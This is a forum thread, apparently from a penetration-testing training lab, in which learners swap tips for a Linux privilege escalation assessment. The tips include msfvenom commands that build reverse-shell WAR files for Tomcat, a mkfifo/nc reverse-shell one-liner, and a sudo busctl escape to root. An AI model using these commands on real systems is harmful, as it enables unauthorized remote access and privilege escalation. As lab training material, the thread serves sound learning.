Help with Linux Local Privilege Escalation - Skills Assessment

shadowalker · December 13, 2023, 11:58am

did u found a wau cuz i had the same issue so i didnt use this way i got root in another way and i already have fullt inrtactive shell so i dont think the probleme is wioth my shell

shadowalker · December 13, 2023, 11:58am

so please if anyone done it this way plzz can u help me

cmarrod · June 15, 2024, 7:46pm

I have been stuck on flag 4 for a long time I am trying to get the root shell by other ways… everybody seem to find the tomcat adm credentials… I have no idea how…

M3F6M1X1 · July 23, 2024, 1:23pm

I got the same issue the last few days. I could not get the root after using !/bin/sh. After using !/bin/sh, I still have the uid of tomcat.

Any suggestion would be appreciated.

M3F6M1X1 · July 24, 2024, 3:58pm

I finally got it.

thor.elveneyes · October 10, 2024, 10:22pm

I have a Tomcat credential, but I need to find the console of admin

thor.elveneyes · October 10, 2024, 10:59pm

Note if you’re struggling to get a shell as tomcat (flag4)
Once you have the tomcatadm credentials, open up a browser and poke around. You can then pop a reverse shell by uploading a malicious war file.

Can you help me to access at the admin console of Tomcat? I have the credential of tomcatadm user, but the browser don’t work.

M3F6M1X1 · October 11, 2024, 12:49am

port 8080 is your friend.

thor.elveneyes · October 11, 2024, 8:59pm

Ok thanks,
yesterday I have discovered the door. Can you help me to understaind where is the problem?

1- Make a Reverse Shell

Now, I have tried to make Reverse Shell with msfvenom

root@htb-xj3iuxvsuy:/tmp# msfvenom -p java/shell/reverse_tcp lhost=10.10.15.181 lport=4444 -f war -o pwn.war

I haved found 2 similar payloads and I have tried both with same error.

payload/java/shell/reverse_tcp
payload/java/shell_reverse_tcp

2 - Start Nc on my Pwnbox

root@htb-xj3iuxvsuy:/tmp# nc -lvnp 4444

3 - On Target, deploy the Pwn.war with tomcatadm user, later click on link on Pwn.war but I receive an error.

thor.elveneyes · October 11, 2024, 9:43pm

Ok I Solved. I have read the post of emdeh and I have found the correct payload.

root@htb-xj3iuxvsuy:/tmp/deployer# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.181 LPORT=4444 -f war -o pwn5.war

thor.elveneyes · October 11, 2024, 10:59pm

Ok I have finally completed this challenge.

So, follow a simple guide to solution

Do not run only /usr/bin/busctl, but you need to run sudo /usr/bin/busctl
You need to exploit the question of the program and put the command !/bin/sh in this point, don’t simply queue the 2 commands

  WARNING: terminal is not fully functional
  -  (press RETURN)!/bin/sh

for this scope, the best trick is spaw a terminal with python3 (it’s a very simple). When you can put a command in the Reverse Shell, type:
python3 -c 'import pty; pty.spawn("/bin/bash")'

and when you have the interactive prompt, put the command with the sudo.

subrealz · November 4, 2024, 12:43pm

If you have difficulties spawning a new shell from the “tomcat_shell”,
You can try to use nc without -e like this rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.111 9001 >/tmp/f
There is also multiple ways to full TTY after that.
Form there it is just exploiting the sudo vulnerability with GTFO.
Enjoy